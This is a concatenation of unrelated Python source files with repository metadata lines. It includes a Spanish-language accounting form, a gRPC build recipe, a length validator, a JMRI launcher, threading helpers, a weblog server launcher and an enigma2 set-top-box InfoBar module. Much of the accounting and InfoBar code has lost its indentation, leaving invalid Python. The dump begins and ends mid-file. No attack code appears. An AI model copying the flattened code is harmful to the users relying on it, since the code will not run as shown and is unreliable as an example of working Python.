                                        abono.numabono),
                            padre = self.wids['ventana'])
        return frabono
def refinar_busqueda_abonos(self, abonos):
"""
Recibe un SelectResults de abonos y muestra una ventana
con la información de todos ellos.
Devuelve la factura del abono seleccionado o None si cancela.
"""
abono = None
filas = [(a.id,
utils.str_fecha(a.fecha),
a.clienteID and a.cliente.nombre or "",
a.importeSinIva, a.facturaDeAbonoID and a.numabono or "")
for a in abonos]
idabono = utils.dialogo_resultado(filas,
titulo = "SELECCIONE ABONO",
cabeceras = ('ID',
'Fecha',
'Cliente',
'Importe sin IVA',
'Factura de abono'),
padre = self.wids['ventana'])
if idabono != None and idabono != -1:
abono = pclases.Abono.get(idabono)
return abono
    def drop_cobro(self, b):
        """
        Unlinks the payment selected in the tv_cobros treeview from the
        current confirming (destroying the Cobro record) after asking
        for confirmation.
        """
        confirming = self.objeto
        txt = """
        ¿Está seguro de desligar la factura seleccionada del confirming?
        """
        if not utils.dialogo(titulo = '¿BORRAR?',
                             texto = txt):
            return
        model, path = self.wids['tv_cobros'].get_selection().get_selected()
        if not path:
            utils.dialogo_info(titulo = "SELECCIONE UN COBRO",
                texto = "Debe seleccionar la fila a eliminar.",
                padre = self.wids['ventana'])
        else:
            # Last model column holds the Cobro id.
            idc = model[path][-1]
            cobro = pclases.Cobro.get(idc)
            antes = sum([c.importe for c in confirming.cobros])
            if antes == confirming.cantidad:
                actualizar_cantidad = True # As the amount equals the sum of
                    # the payments, removing one must update the total
                    # amount. Otherwise (amount different from the sum of
                    # the payments) it was entered by hand and so it must
                    # be respected.
            else:
                actualizar_cantidad = False
            cobro.destroy(usuario = self.usuario, ventana = __file__)
            if actualizar_cantidad:
                confirming.cantidad = sum(
                    [c.importe for c in confirming.cobros])
                # The collected amount can never exceed the new total.
                if confirming.cobrado > confirming.cantidad:
                    confirming.cobrado = confirming.cantidad
            self.actualizar_ventana()
def cambiar_fechac(self, b):
self.wids['e_fechac'].set_text(utils.str_fecha(
utils.mostrar_calendario(padre = self.wids['ventana'])))
def cambiar_fechar(self, b):
self.wids['e_fechar'].set_text(utils.str_fecha(
utils.mostrar_calendario(padre = self.wids['ventana'])))
def borrar(self, widget):
"""
Elimina el confirming en pantalla.
"""
confirming = self.objeto
if confirming != None:
if utils.dialogo('¿Está seguro de eliminar el confirming actual?',
'BORRAR CONFIRMING',
padre = self.wids['ventana']):
confirming.notificador.set_func(lambda : None)
try:
for c in confirming.cobros:
c.destroy(usuario = self.usuario, ventana = __file__)
for e in confirming.efectos:
e.destroy(usuario = self.usuario, ventana = __file__)
confirming.destroy(usuario = self.usuario,
ventana = __file__)
self.ir_a_primero()
except:
txt = """
El confirming no se eliminó completamente.
Tal vez el confirming o los vencimientos de facturas
relacionados estén siendo referenciados por otros
elementos de la aplicación. Contacte con el administrador.
Información de depuración:
"""
for c in confirming.cobros:
txt += "ID cobro: %d.\n" % c.id
txt += "ID confirming: %d\n" % confirming.id
utils.dialogo_info(titulo = 'ERROR: NO SE PUDO BORRAR',
texto = txt)
if __name__ == '__main__':
    # Manual test entry point: open the confirmings window stand-alone.
    v = Confirmings()
| pacoqueen/ginn | ginn/formularios/confirmings.py | Python | gpl-2.0 | 54,543 |
# Copyright (C) 2016 - Yevgen Muntyan
# Copyright (C) 2016 - Ignacio Casal Quinteiro
# Copyright (C) 2016 - Arnavion
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
from gvsbuild.utils.base_builders import CmakeProject
from gvsbuild.utils.base_expanders import GitRepo
from gvsbuild.utils.base_project import Project, project_add
@project_add
class Grpc(GitRepo, CmakeProject):
    """gRPC v1.12.0: fetched from git (with submodules) and built via CMake/ninja."""

    def __init__(self):
        Project.__init__(
            self,
            "grpc",
            repo_url="https://github.com/grpc/grpc.git",
            fetch_submodules=True,
            tag="v1.12.0",
            dependencies=["go", "nuget", "protobuf", "perl", "zlib", "nasm"],
            patches=["0001-removing-extra-plugins.patch"],
        )

    def build(self):
        # Use the packaged zlib/protobuf instead of the bundled submodules.
        CmakeProject.build(
            self,
            cmake_params="-DgRPC_ZLIB_PROVIDER=package -DgRPC_PROTOBUF_PROVIDER=package",
            use_ninja=True,
            out_of_source=False,
        )
        # Install build artifacts ("<source path> <destination>"), in the
        # same order the original issued the individual install calls.
        artifacts = (
            r".\third_party\boringssl\ssl\ssl.lib lib",
            r".\third_party\boringssl\crypto\crypto.lib lib",
            r".\gpr.lib lib",
            r".\grpc.lib lib",
            r".\grpc++.lib lib",
            r".\grpc_cpp_plugin.exe bin",
            r".\grpc_cpp_plugin.pdb bin",
            r".\grpc_csharp_plugin.exe bin",
            r".\grpc_csharp_plugin.pdb bin",
            r".\LICENSE share\doc\grpc",
        )
        for artifact in artifacts:
            self.install(artifact)
| wingtk/gvsbuild | gvsbuild/projects/grpc.py | Python | gpl-2.0 | 2,081 |
from .validator import Validator
from ..util import register_as_validator
class ExactLength(Validator):
    """Validator that accepts data only when its length is exactly `exact_length`."""

    __validator_name__ = 'exact_length'

    def __init__(self, exact_length):
        super(ExactLength, self).__init__()
        # Required length the validated data must have.
        self.exact_length = exact_length

    def validate(self, data, request=None, session=None):
        """Return True when len(data) equals the configured exact length."""
        # The original used `>=`, which implements a *minimum* length and
        # contradicts the validator's name; exact length requires equality.
        return len(data) == self.exact_length
register_as_validator(ExactLength) | Performante/pyFormante | pyFormante/validation/exact_length.py | Python | gpl-2.0 | 411 |
import jmri.jmrit.jython.Jynstrument as Jynstrument
import jmri.jmrit.catalog.NamedIcon as NamedIcon
import jmri.jmrit.symbolicprog.tabbedframe.PaneOpsProgAction as PaneOpsProgAction
import javax.swing.JButton as JButton
class DecoderPro(Jynstrument):
    # Jynstrument launcher button that opens the DecoderPro ops-mode programmer.
    def getExpectedContextClassName(self):
        # This widget may be dropped onto any Swing JComponent container.
        return "javax.swing.JComponent"
    def init(self):
        # Build an icon-only button wrapping the programmer action.
        jbNew = JButton( PaneOpsProgAction() )
        jbNew.setIcon( NamedIcon("resources/decoderpro.gif","resources/decoderpro.gif") )
        jbNew.addMouseListener(self.getMouseListeners()[0]) # In order to get the popupmenu on the button too
        jbNew.setToolTipText( jbNew.getText() )
        jbNew.setText( None )  # keep the action's text only as tooltip
        self.add(jbNew)
    def quit(self):
        pass | ctag/cpe453 | JMRI/jython/Jynstruments/Launchers/DecoderPro.jyn/DecoderPro.py | Python | gpl-2.0 | 744 |
#!/usr/bin/python
# coding:utf-8
# Author: ASU --<andrei.suiu@gmail.com>
# Purpose: Concurrent utility classes (name coming from RACEconditionLIBrary)
# Created: 11/26/2015
import time
__author__ = 'ASU'
class ContextLock():
    """Adapt a plain lock object to the context-manager protocol.

    The wrapped lock is acquired on entry and released on exit;
    exceptions raised inside the ``with`` block are never suppressed.
    """

    def __init__(self, lock):
        """
        :param lock: lock exposing ``acquire()`` and ``release()``
        :type lock: thread.LockType
        """
        self._wrapped_lock = lock

    def __enter__(self):
        self._wrapped_lock.acquire()

    def __exit__(self, exc_type, exc_value, traceback):
        self._wrapped_lock.release()
        # Returning False lets any exception propagate to the caller.
        return False
class TimePerformanceLogger:
    """
    Measures how long a ``with`` block takes and reports it.

    On exit, the elapsed wall-clock time in seconds is passed to the
    callback supplied at construction; exceptions are not suppressed.
    """

    def __init__(self, logger):
        """
        :param logger: callback invoked with the elapsed number of seconds
        :type logger: (basestring) -> None
        """
        self._report = logger

    def __enter__(self):
        self._start = time.time()

    def __exit__(self, exc_type, exc_value, traceback):
        elapsed = time.time() - self._start
        self._report(elapsed)
        # True (suppress nothing happened) only when no exception occurred.
        return exc_type is None
| asuiu/pyxtension | py2/pyxtension/racelib.py | Python | gpl-2.0 | 1,107 |
'''
Copyright (C) 2016 Quinn D Granfor <spootdev@gmail.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
'''
from __future__ import absolute_import, division, print_function, unicode_literals
import logging # pylint: disable=W0611
import sys
import subprocess
import signal
import os
from common import common_logging
from common import common_signal
# Install SIGINT/SIGTERM break handlers so the service shuts down cleanly.
common_signal.com_signal_set_break()
# Start the application-wide logging configuration.
common_logging.com_logging_start()
logging.info('Check Certs')
# Check for and create SSL certs if needed; the generator is run
# synchronously because the servers below need the cert to exist.
if not os.path.isfile('./key/cacert.pem'):
    proc_ssl = subprocess.Popen(['subprogram_ssl_keygen'], shell=False)
    proc_ssl.wait()
    # If the certificate still does not exist the generator failed: abort.
    if not os.path.isfile('./key/cacert.pem'):
        logging.critical("Cannot generate SSL certificate. Exiting.....")
        sys.exit()
# Start the other reactor via Popen as it's non-blocking.
proc = subprocess.Popen(['subprogram_reactor_string_weblog'], shell=False)
logging.info("Reactor PID: %s", proc.pid)
# Fire up the uwsgi server for the web_log application (HTTP on port 8081).
proc_web_app = subprocess.Popen(['uwsgi', '--socket', '0.0.0.0:8081', '--protocol', 'http',
                                 '--chdir=./server/web_log', '--ini', './server/web_log/weblog_uwsgi.ini'],
                                shell=False)
# Block here until the uwsgi process exits.
proc_web_app.wait()
# Stop both child processes on the way out.
os.kill(proc.pid, signal.SIGTERM)
os.kill(proc_web_app.pid, signal.SIGTERM)
| MediaKraken/mkarchive | main_server_weblog.py | Python | gpl-2.0 | 1,963 |
from Tools.Profile import profile
from Tools.BoundFunction import boundFunction
# workaround for required config entry dependencies.
import Screens.MovieSelection
from Components.PluginComponent import plugins
from Plugins.Plugin import PluginDescriptor
from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
from Components.Label import Label
from Components.Pixmap import MultiPixmap
from Tools.Directories import fileExists
profile("LOAD:enigma")
import enigma
import os
from boxbranding import getBoxType, getMachineBrand, getBrandOEM, getMachineBuild, getMachineName
boxtype = getBoxType()
profile("LOAD:InfoBarGenerics")
from Screens.InfoBarGenerics import InfoBarShowHide, \
InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarRdsDecoder, InfoBarRedButton, InfoBarTimerButton, InfoBarVmodeButton, \
InfoBarEPG, InfoBarSeek, InfoBarInstantRecord, InfoBarResolutionSelection, InfoBarAspectSelection, \
InfoBarAudioSelection, InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarUnhandledKey, InfoBarLongKeyDetection, \
InfoBarSubserviceSelection, InfoBarShowMovies, \
InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, InfoBarSimpleEventView, InfoBarBuffer, \
InfoBarSummarySupport, InfoBarMoviePlayerSummarySupport, InfoBarTimeshiftState, InfoBarTeletextPlugin, InfoBarExtensions, \
InfoBarSubtitleSupport, InfoBarPiP, InfoBarPlugins, InfoBarServiceErrorPopupSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, \
InfoBarHdmi, setResumePoint, delResumePoint
from Screens.ButtonSetup import InfoBarButtonSetup
profile("LOAD:InitBar_Components")
from Components.ActionMap import HelpableActionMap
from Components.Timeshift import InfoBarTimeshift
from Components.config import config
from Components.ServiceEventTracker import ServiceEventTracker, InfoBarBase
profile("LOAD:HelpableScreen")
from Screens.HelpMenu import HelpableScreen
class InfoBar(InfoBarBase, InfoBarShowHide,
InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarEPG, InfoBarRdsDecoder,
InfoBarInstantRecord, InfoBarAudioSelection, InfoBarRedButton, InfoBarTimerButton, InfoBarResolutionSelection, InfoBarAspectSelection, InfoBarVmodeButton,
HelpableScreen, InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarUnhandledKey, InfoBarLongKeyDetection,
InfoBarSubserviceSelection, InfoBarTimeshift, InfoBarSeek, InfoBarCueSheetSupport, InfoBarBuffer,
InfoBarSummarySupport, InfoBarTimeshiftState, InfoBarTeletextPlugin, InfoBarExtensions,
InfoBarPiP, InfoBarPlugins, InfoBarSubtitleSupport, InfoBarServiceErrorPopupSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper,
InfoBarHdmi, Screen, InfoBarButtonSetup):
ALLOW_SUSPEND = True
instance = None
def __init__(self, session):
Screen.__init__(self, session)
if config.usage.show_infobar_lite.value and (config.skin.primary_skin.value == "OPD-Blue-Line/skin.xml" or config.skin.primary_skin.value.startswith('oDreamy-FHD/skin.xml/')):
self.skinName = "OPD-Blue-Line/skin.xml"
self["actions"] = HelpableActionMap(self, "InfobarActions",
{
"showMovies": (self.showMovies, _("Play recorded movies...")),
"showRadio": (self.showRadioButton, _("Show the radio player...")),
"showTv": (self.showTvButton, _("Show the tv player...")),
"toogleTvRadio": (self.toogleTvRadio, _("Toggels between tv and radio...")),
"openBouquetList": (self.openBouquetList, _("Open bouquetlist...")),
"showMediaPlayer": (self.showMediaPlayer, _("Show the media player...")),
"openBouquetList": (self.openBouquetList, _("open bouquetlist")),
"openWeather": (self.openWeather, _("Open Weather...")),
"openTimerList": (self.openTimerList, _("Open Timerlist...")),
"openAutoTimerList": (self.openAutoTimerList, _("Open AutoTimerlist...")),
"openEPGSearch": (self.openEPGSearch, _("Open EPGSearch...")),
"openIMDB": (self.openIMDB, _("Open IMDB...")),
"showMC": (self.showMediaCenter, _("Show the media center...")),
"openSleepTimer": (self.openPowerTimerList, _("Show the Sleep Timer...")),
'ZoomInOut': (self.ZoomInOut, _('Zoom In/Out TV...')),
'ZoomOff': (self.ZoomOff, _('Zoom Off...')),
'HarddiskSetup': (self.HarddiskSetup, _('Select HDD')),
"showWWW": (self.showPORTAL, _("Open MediaPortal...")),
"showSetup": (self.showSetup, _("Show setup...")),
"showFormat": (self.showFormat, _("Show Format Setup...")),
"showPluginBrowser": (self.showPluginBrowser, _("Show the plugins...")),
"showBoxPortal": (self.showBoxPortal, _("Show Box Portal...")),
}, prio=2)
self["key_red"] = Label()
self["key_yellow"] = Label()
self["key_blue"] = Label()
self["key_green"] = Label()
self.allowPiP = True
self.radioTV = 0
for x in HelpableScreen, \
InfoBarBase, InfoBarShowHide, \
InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarEPG, InfoBarRdsDecoder, \
InfoBarInstantRecord, InfoBarAudioSelection, InfoBarRedButton, InfoBarTimerButton, InfoBarUnhandledKey, InfoBarLongKeyDetection, InfoBarResolutionSelection, InfoBarVmodeButton, \
InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarSubserviceSelection, InfoBarAspectSelection, InfoBarBuffer, \
InfoBarTimeshift, InfoBarSeek, InfoBarCueSheetSupport, InfoBarSummarySupport, InfoBarTimeshiftState, \
InfoBarTeletextPlugin, InfoBarExtensions, InfoBarPiP, InfoBarSubtitleSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, \
InfoBarHdmi, InfoBarPlugins, InfoBarServiceErrorPopupSupport, InfoBarButtonSetup:
x.__init__(self)
self.helpList.append((self["actions"], "InfobarActions", [("showMovies", _("Watch recordings..."))]))
self.helpList.append((self["actions"], "InfobarActions", [("showRadio", _("Listen to the radio..."))]))
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
enigma.iPlayableService.evUpdatedEventInfo: self.__eventInfoChanged
})
self.current_begin_time=0
assert InfoBar.instance is None, "class InfoBar is a singleton class and just one instance of this class is allowed!"
InfoBar.instance = self
if config.misc.initialchannelselection.value:
self.onShown.append(self.showMenu)
self.zoomrate = 0
self.zoomin = 1
self.onShow.append(self.doButtonsCheck)
def showMenu(self):
self.onShown.remove(self.showMenu)
config.misc.initialchannelselection.value = False
config.misc.initialchannelselection.save()
self.mainMenu()
def doButtonsCheck(self):
if config.plisettings.ColouredButtons.value:
self["key_yellow"].setText(_("Extensions"))
if config.usage.defaultEPGType.value == "Graphical EPG..." or config.usage.defaultEPGType.value == "None":
self["key_red"].setText(_("Single EPG"))
else:
self["key_red"].setText(_("ViX EPG"))
if not config.plisettings.Subservice.value:
self["key_green"].setText(_("Timers"))
else:
self["key_green"].setText(_("Green Panel"))
self["key_blue"].setText(_("Blue Panel"))
def __onClose(self):
InfoBar.instance = None
def __eventInfoChanged(self):
if self.execing:
service = self.session.nav.getCurrentService()
old_begin_time = self.current_begin_time
info = service and service.info()
ptr = info and info.getEvent(0)
self.current_begin_time = ptr and ptr.getBeginTime() or 0
if config.usage.show_infobar_on_event_change.value:
if old_begin_time and old_begin_time != self.current_begin_time:
self.doShow()
def __checkServiceStarted(self):
self.__serviceStarted(True)
self.onExecBegin.remove(self.__checkServiceStarted)
def serviceStarted(self): #override from InfoBarShowHide
new = self.servicelist.newServicePlayed()
if self.execing:
InfoBarShowHide.serviceStarted(self)
self.current_begin_time=0
elif not self.__checkServiceStarted in self.onShown and new:
self.onShown.append(self.__checkServiceStarted)
def __checkServiceStarted(self):
self.serviceStarted()
self.onShown.remove(self.__checkServiceStarted)
def openBouquetList(self):
if config.usage.tvradiobutton_mode.value == "MovieList":
self.showTvChannelList(True)
self.showMovies()
elif config.usage.tvradiobutton_mode.value == "ChannelList":
self.showTvChannelList(True)
elif config.usage.tvradiobutton_mode.value == "BouquetList":
self.showTvChannelList(True)
self.servicelist.showFavourites()
def showTvButton(self):
if boxtype.startswith('gb') or boxtype in ('classm', 'genius', 'evo', 'galaxym6'):
self.toogleTvRadio()
elif boxtype in ('uniboxhd1', 'uniboxhd2', 'uniboxhd3', 'sezam5000hd', 'mbtwin'):
self.showMovies()
else:
self.showTv()
def showTv(self):
if config.usage.tvradiobutton_mode.value == "MovieList":
self.showTvChannelList(True)
self.showMovies()
elif config.usage.tvradiobutton_mode.value == "BouquetList":
self.showTvChannelList(True)
if config.usage.show_servicelist.value:
self.servicelist.showFavourites()
else:
self.showTvChannelList(True)
def showRadioButton(self):
if boxtype.startswith('gb') or boxtype.startswith('azbox') or boxtype in ('classm', 'genius', 'evo', 'galaxym6', 'uniboxhd1', 'uniboxhd2', 'uniboxhd3', 'sezam5000hd', 'mbtwin', 'beyonwizt3'):
self.toogleTvRadio()
else:
self.showRadio()
def showRadio(self):
if config.usage.e1like_radio_mode.value:
if config.usage.tvradiobutton_mode.value == "BouquetList":
self.showRadioChannelList(True)
if config.usage.show_servicelist.value:
self.servicelist.showFavourites()
else:
self.showRadioChannelList(True)
else:
self.rds_display.hide() # in InfoBarRdsDecoder
from Screens.ChannelSelection import ChannelSelectionRadio
self.session.openWithCallback(self.ChannelSelectionRadioClosed, ChannelSelectionRadio, self)
def toogleTvRadio(self):
if self.radioTV == 1:
self.radioTV = 0
self.showTv()
else:
self.radioTV = 1
self.showRadio()
def ChannelSelectionRadioClosed(self, *arg):
self.rds_display.show() # in InfoBarRdsDecoder
self.radioTV = 0
self.doShow()
def showMovies(self, defaultRef=None):
if getMachineBrand() == 'GI' or boxtype.startswith('azbox') or boxtype.startswith('ini') or boxtype.startswith('venton'):
from Screens.BoxPortal import BoxPortal
self.session.open(BoxPortal)
else:
self.showMoviePlayer(defaultRef)
def showMoviePlayer(self, defaultRef=None): #for using with hotkeys (ButtonSetup.py) regardless of plugins which overwrite the showMovies function
self.lastservice = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if self.lastservice and ':0:/' in self.lastservice.toString():
self.lastservice = enigma.eServiceReference(config.movielist.curentlyplayingservice.value)
self.session.openWithCallback(self.movieSelected, Screens.MovieSelection.MovieSelection, defaultRef, timeshiftEnabled = self.timeshiftEnabled())
def movieSelected(self, service):
ref = self.lastservice
del self.lastservice
if service is None:
if ref and not self.session.nav.getCurrentlyPlayingServiceOrGroup():
self.session.nav.playService(ref)
else:
self.session.open(MoviePlayer, service, slist = self.servicelist, lastservice = ref)
def showMediaPlayer(self):
try:
from Plugins.Extensions.MediaPlayer.plugin import MediaPlayer
self.session.open(MediaPlayer)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaPlayer plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showMediaCenter(self):
try:
from Plugins.Extensions.BMediaCenter.plugin import DMC_MainMenu
self.session.open(DMC_MainMenu)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaCenter plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openSleepTimer(self):
from Screens.SleepTimerEdit import SleepTimerEdit
self.session.open(SleepTimerEdit)
def openTimerList(self):
from Screens.TimerEdit import TimerEditList
self.session.open(TimerEditList)
def openPowerTimerList(self):
from Screens.PowerTimerEdit import PowerTimerEditList
self.session.open(PowerTimerEditList)
def openAutoTimerList(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("AutoTimer"):
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The AutoTimer plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openWeather(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Weather Details"):
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The Weather plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openEPGSearch(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("EPGSearch") or plugin.name == _("search EPG...") or plugin.name == "Durchsuche EPG...":
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The EPGSearch plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openIMDB(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("IMDb Details"):
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The IMDb plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def ZoomInOut(self):
zoomval = 0
if self.zoomrate > 3:
self.zoomin = 0
elif self.zoomrate < -9:
self.zoomin = 1
if self.zoomin == 1:
self.zoomrate += 1
else:
self.zoomrate -= 1
if self.zoomrate < 0:
zoomval = abs(self.zoomrate) + 10
else:
zoomval = self.zoomrate
print 'zoomRate:', self.zoomrate
print 'zoomval:', zoomval
if fileExists("/proc/stb/vmpeg/0/zoomrate"):
file = open('/proc/stb/vmpeg/0/zoomrate', 'w')
file.write('%d' % int(zoomval))
file.close()
def ZoomOff(self):
self.zoomrate = 0
self.zoomin = 1
if fileExists("/proc/stb/vmpeg/0/zoomrate"):
file = open('/proc/stb/vmpeg/0/zoomrate', 'w')
file.write(str(0))
file.close()
def HarddiskSetup(self):
from Screens.HarddiskSetup import HarddiskSelection
self.session.open(HarddiskSelection)
def showPORTAL(self):
try:
from Plugins.Extensions.MediaPortal.plugin import MPmain as MediaPortal
MediaPortal(self.session)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaPortal plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showSetup(self):
from Screens.Menu import MainMenu, mdom
root = mdom.getroot()
for x in root.findall("menu"):
y = x.find("id")
if y is not None:
id = y.get("val")
if id and id == "setup":
self.session.infobar = self
self.session.open(MainMenu, x)
return
def showFormat(self):
try:
from Plugins.SystemPlugins.Videomode.plugin import videoSetupMain
self.session.instantiateDialog(videoSetupMain)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The VideoMode plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showPluginBrowser(self):
    """Bring up the green-panel plugin browser."""
    from OPENDROID.GreenPanel import GreenPanel as panel_screen
    self.session.open(panel_screen)
def showBoxPortal(self):
    """Open the box portal on supported hardware; otherwise fall back
    to the movie list.
    """
    has_portal = getMachineBrand() == 'GI' or boxtype.startswith(('azbox', 'ini', 'venton'))
    if not has_portal:
        self.showMovies()
        return
    from Screens.BoxPortal import BoxPortal
    self.session.open(BoxPortal)
def setAudioTrack(service):
    """Automatically select the preferred audio track for *service*.

    Builds a list of (index, language, description) tuples from the
    service's audio tracks, then tries to activate the first track that
    matches the configured auto-select languages (falling back to the
    image's system language), trying AC3 first or last depending on
    config.autolanguage.audio_defaultac3.  Any failure is logged and
    swallowed so playback is never interrupted.
    """
    try:
        from Tools.ISO639 import LanguageCodes as langC
        tracks = service and service.audioTracks()
        nTracks = tracks and tracks.getNumberOfTracks() or 0
        if not nTracks: return
        idx = 0
        trackList = []
        # Collect (index, language, description) for every audio track;
        # known ISO639 codes are translated to plain language names.
        for i in xrange(nTracks):
            audioInfo = tracks.getTrackInfo(i)
            lang = audioInfo.getLanguage()
            if langC.has_key(lang):
                lang = langC[lang][0]
            desc = audioInfo.getDescription()
            track = idx, lang, desc
            idx += 1
            trackList += [track]
        seltrack = tracks.getCurrentTrack()
        # we need default selected language from image
        # to set the audiotrack if "config.autolanguage.audio_autoselect...values" are not set
        from Components.Language import language
        syslang = language.getLanguage()[:2]
        syslang = langC[syslang][0]
        # NOTE(review): the parenthesised "or" chain evaluates to the FIRST
        # truthy value, so effectively only audio_autoselect1 is compared
        # against "---" here; presumably "any of the four is configured"
        # was intended - confirm before changing.
        if (config.autolanguage.audio_autoselect1.value or config.autolanguage.audio_autoselect2.value or config.autolanguage.audio_autoselect3.value or config.autolanguage.audio_autoselect4.value) != "---":
            audiolang = [config.autolanguage.audio_autoselect1.value, config.autolanguage.audio_autoselect2.value, config.autolanguage.audio_autoselect3.value, config.autolanguage.audio_autoselect4.value]
            caudiolang = True
        else:
            # NOTE(review): audiolang is a plain string in this branch, so
            # tryAudioTrack iterates it character by character; possibly
            # [syslang] was intended - verify.
            audiolang = syslang
            caudiolang = False
        useAc3 = config.autolanguage.audio_defaultac3.value
        # Preferred codec first, then the other; fall back to track 0.
        if useAc3:
            matchedAc3 = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, useAc3)
            if matchedAc3: return
            matchedMpeg = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, False)
            if matchedMpeg: return
            tracks.selectTrack(0) # fallback to track 1(0)
            return
        else:
            matchedMpeg = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, False)
            if matchedMpeg: return
            matchedAc3 = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, useAc3)
            if matchedAc3: return
            tracks.selectTrack(0) # fallback to track 1(0)
    except Exception, e:
        print("[MoviePlayer] audioTrack exception:\n" + str(e))
def tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, useAc3):
    """Activate the first track in *trackList* whose language matches an
    entry of *audiolang*.

    trackList holds (index, language, description) tuples; seltrack is
    the currently active track index.  When useAc3 is set only tracks
    whose description starts with 'AC' qualify.  If the match is already
    the current track nothing is switched; otherwise tracks.selectTrack
    is called.  Returns True on a match, False otherwise.
    """
    for wanted in audiolang:
        if caudiolang:
            # Map the raw config choice values onto the plain language
            # names used in trackList (see original note: a proper
            # description in config.py would make this unnecessary).
            wanted = wanted.replace('eng qaa Englisch', 'English').replace('deu ger', 'German')
        for idx, lang, desc in trackList:
            if wanted != lang:
                continue
            if useAc3 and not desc.startswith('AC'):
                continue
            if seltrack == idx:
                # Already listening to the matching track.
                print("[MoviePlayer] audio track is current selected track: " + str((idx, lang, desc)))
            else:
                print("[MoviePlayer] audio track match: " + str((idx, lang, desc)))
                tracks.selectTrack(idx)
            return True
    return False
class MoviePlayer(InfoBarAspectSelection, InfoBarSimpleEventView, InfoBarBase, InfoBarShowHide, InfoBarLongKeyDetection, InfoBarMenu, InfoBarEPG, \
        InfoBarSeek, InfoBarShowMovies, InfoBarInstantRecord, InfoBarAudioSelection, HelpableScreen, InfoBarNotifications,
        InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport,
        InfoBarMoviePlayerSummarySupport, InfoBarSubtitleSupport, Screen, InfoBarTeletextPlugin,
        InfoBarServiceErrorPopupSupport, InfoBarExtensions, InfoBarPlugins, InfoBarPiP, InfoBarZoom, InfoBarHdmi, InfoBarButtonSetup):
    """Singleton movie-playback screen.

    Aggregates the infobar mixins needed for playback (seek, PiP, audio
    selection, cue sheets, ...), plays *service* on construction and
    restores *lastservice* when closed.  Only one instance may exist at
    a time (see the assert in __init__).
    """
    ENABLE_RESUME_SUPPORT = True
    ALLOW_SUSPEND = True
    instance = None  # the single live MoviePlayer, or None

    def __init__(self, session, service, slist = None, lastservice = None):
        """Start playing *service*; *slist* is the channel list used for
        PiP zapping, *lastservice* the service to return to on close."""
        Screen.__init__(self, session)
        InfoBarAspectSelection.__init__(self)
        InfoBarAudioSelection.__init__(self)
        InfoBarSimpleEventView.__init__(self)
        self.pts_pvrStateDialog = ""
        self["key_yellow"] = Label()
        self["key_blue"] = Label()
        self["key_green"] = Label()
        self["eventname"] = Label()
